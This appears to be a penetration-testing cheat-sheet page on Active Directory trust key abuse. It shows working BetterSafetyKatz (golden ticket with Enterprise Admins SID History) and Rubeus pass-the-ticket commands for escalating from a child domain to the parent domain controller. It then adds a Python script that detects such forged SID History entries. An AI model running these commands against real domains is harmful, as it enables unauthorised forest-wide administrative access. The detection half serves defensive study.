
# Trust Keys

Abusing trust keys allows us to gain access to the domain controller of the immediate parent domain.

Obtain the trust key

Forge the inter-realm TGT with a SID History entry matching the SID of the Enterprise Admins group; the parent domain's DC will then issue us a TGS for any service it hosts.

```
BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:<child_domain> /sid:<domain_SID> /sids:<EA_SID> /rc4:<trustkey> /service:krbtgt /target:<parent_domain> /ticket:Path\to\trust_key.kirbi" "exit"
```

Present the forged inter-realm TGT to the parent DC to obtain a TGS for the target service, and inject the resulting ticket into the current session (/ptt).

{% code title="Rubeus.exe" %}

```
Rubeus.exe asktgs /ticket:Path\to\trust_key.kirbi /service:<service/path> /dc:<parent_dc> /ptt
```

{% endcode %}

Now you can request a TGS for any other service hosted on that machine simply by changing /service:<value>.
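From the defender's side, the ticket forged above stands out because its SID History carries a SID whose domain part is not the issuing child domain and whose RID is a privileged well-known one (519 for Enterprise Admins). The following Python check is an added example, not code from the original page; the record layout and all SIDs in it are constructed.

```python
"""Flag SID History / ExtraSids entries that smuggle a privileged group from
another domain into a ticket issued by a child domain (added example)."""
import re

# Well-known RIDs that should never reach a parent domain via SID History.
PRIVILEGED_RIDS = {
    512: "Domain Admins",
    518: "Schema Admins",
    519: "Enterprise Admins",
}

# Domain SIDs look like S-1-5-21-<a>-<b>-<c>-<RID>; builtin SIDs (S-1-5-32-*) do not match.
SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+-(\d+)$")


def split_sid(sid):
    """Return (domain_sid, rid) for a domain SID, or (None, None) otherwise."""
    m = SID_RE.match(sid)
    if not m:
        return None, None
    return sid.rsplit("-", 1)[0], int(m.group(1))


def check_ticket(issuing_domain_sid, extra_sids):
    """Return (sid, group_name, foreign_domain_sid) for every extra SID that
    names a privileged group of a domain other than the issuing one."""
    findings = []
    for sid in extra_sids:
        domain, rid = split_sid(sid)
        if domain is None:
            continue
        if rid in PRIVILEGED_RIDS and domain != issuing_domain_sid:
            findings.append((sid, PRIVILEGED_RIDS[rid], domain))
    return findings


if __name__ == "__main__":
    # Constructed sample: child domain issues a ticket whose ExtraSids contain
    # RID 519 of a different (parent) domain plus one ordinary child-domain group.
    child_sid = "S-1-5-21-1111-2222-3333"
    extra = ["S-1-5-21-4444-5555-6666-519", "S-1-5-21-1111-2222-3333-1105"]
    for sid, name, dom in check_ticket(child_sid, extra):
        print(f"ALERT: {sid} grants {name} of foreign domain {dom}")
```

Feed it the issuing domain SID and the ExtraSids decoded from the ticket's PAC on the parent DC; a hit is a strong indicator of the SID History abuse described on this page.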